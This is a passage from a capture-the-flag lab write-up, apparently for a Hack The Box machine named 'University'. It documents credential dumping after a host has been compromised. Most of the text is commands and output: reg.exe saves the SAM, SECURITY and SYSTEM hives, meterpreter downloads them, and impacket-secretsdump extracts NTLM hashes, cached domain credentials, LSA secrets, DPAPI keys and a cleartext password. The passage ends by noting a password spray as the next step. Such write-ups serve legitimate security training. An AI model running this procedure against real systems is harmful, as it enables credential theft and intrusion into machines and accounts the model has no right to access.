Hashdump


Dumping the credential hashes after compromising the wc-3.university.htb host

PS C:\tmp> reg.exe save hklm\sam .\sam
 reg.exe save hklm\sam .\sam
The operation completed successfully.
 
PS C:\tmp>reg.exe save hklm\security .\security
reg.exe save hklm\security .\security
The operation completed successfully.
 
PS C:\tmp> reg.exe save hklm\system .\system
 reg.exe save hklm\system .\system
The operation completed successfully.
 
meterpreter > download C:\\tmp\\sam
[*] Downloading: C:\tmp\sam -> /home/kali/archive/htb/labs/university/sam
[*] Completed  : C:\tmp\sam -> /home/kali/archive/htb/labs/university/sam
meterpreter > download C:\\tmp\\security
[*] Downloading: C:\tmp\security -> /home/kali/archive/htb/labs/university/security
[*] Completed  : C:\tmp\security -> /home/kali/archive/htb/labs/university/security
meterpreter > download C:\\tmp\\system
[*] Downloading: C:\tmp\system -> /home/kali/archive/htb/labs/university/system
[*] Completed  : C:\tmp\system -> /home/kali/archive/htb/labs/university/system

Exfiltrating LSA registry hive

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-secretsdump local -sam pe_ws-3/hashdump/sam -security pe_ws-3/hashdump/security -system pe_ws-3/hashdump/system
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0xcafb76872642f6bc09dd9e17ae7cddec
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:71ffc7b2d302f8059b92219e7d7a7ba1:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:a8bf1bae201f988dc1ca99f1043e11dc:::
[*] Dumping cached domain logon information (domain/username:hash)
UNIVERSITY.HTB/Martin.T:$DCC2$10240#Martin.T#97cacb28b851029449213555226a7dcc: (2024-11-02 23:30:43)
UNIVERSITY.HTB/Administrator:$DCC2$10240#Administrator#d215fbd6ac39c2d0e49628006db4a2ac: (2024-10-21 23:19:28)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:b005e0d4f4724296a7513d11b36ba2e9ccd669eca34e4985f48c9f6aedadd85d0ecbe634ad06cbbba69c304449de31229f57edbcd3fdca31663bdf085685dd8120eaeded1b27d744d2a466a9ec67c03bb6b6cf28f9b36cf0b0f04431f894e72fc46ba1710beb3fd0998078d482066e613084e0d7b3f7275a4098a4c62f5e4a9553eaadbd1f2241666c7cb55622b9d13bbcd2bec24107acfc91abe33844f9b9279d5784265ffae661820d6338ff4b2b6d9b560f9bcb2de02fc2620813c9cdf7944278b479d05d1509355075fa280f93dc31fd18d6fcc61b3e77091dccb9cdb4e7cefa21596d35c38647284377d6428e7c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34
[*] DefaultPassword 
(Unknown User):v3ryS0l!dP@sswd#X
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x1b8c79e73a9fe233c28cc4336b7ef8a310cf7335
dpapi_userkey:0x83c20b2c903526e92b01436284cfc32babe48018
[*] NL$KM 
 0000   A9 CF 8B DE AB C8 F3 82  92 9F 69 F3 F8 8B C2 F4   ..........i.....
 0010   E5 6D AE 0B C5 05 41 8A  B3 3C 6A 24 92 D9 F5 95   .m....A..<j$....
 0020   BB 90 A6 24 55 AE 8B 6B  7C B5 B2 40 89 52 75 66   ...$U..k|..@.Ruf
 0030   0E F1 23 17 89 D5 A2 AD  22 05 F5 D2 7F F6 DC 87   ..#.....".......
NL$KM:a9cf8bdeabc8f382929f69f3f88bc2f4e56dae0bc505418ab33c6a2492d9f595bb90a62455ae8b6b7cb5b240895275660ef1231789d5a2ad2205f5d27ff6dc87
[*] Cleaning up... 

Besides the credential hashes, there is a CLEARTEXT password; v3ryS0l!dP@sswd#X Performing password spray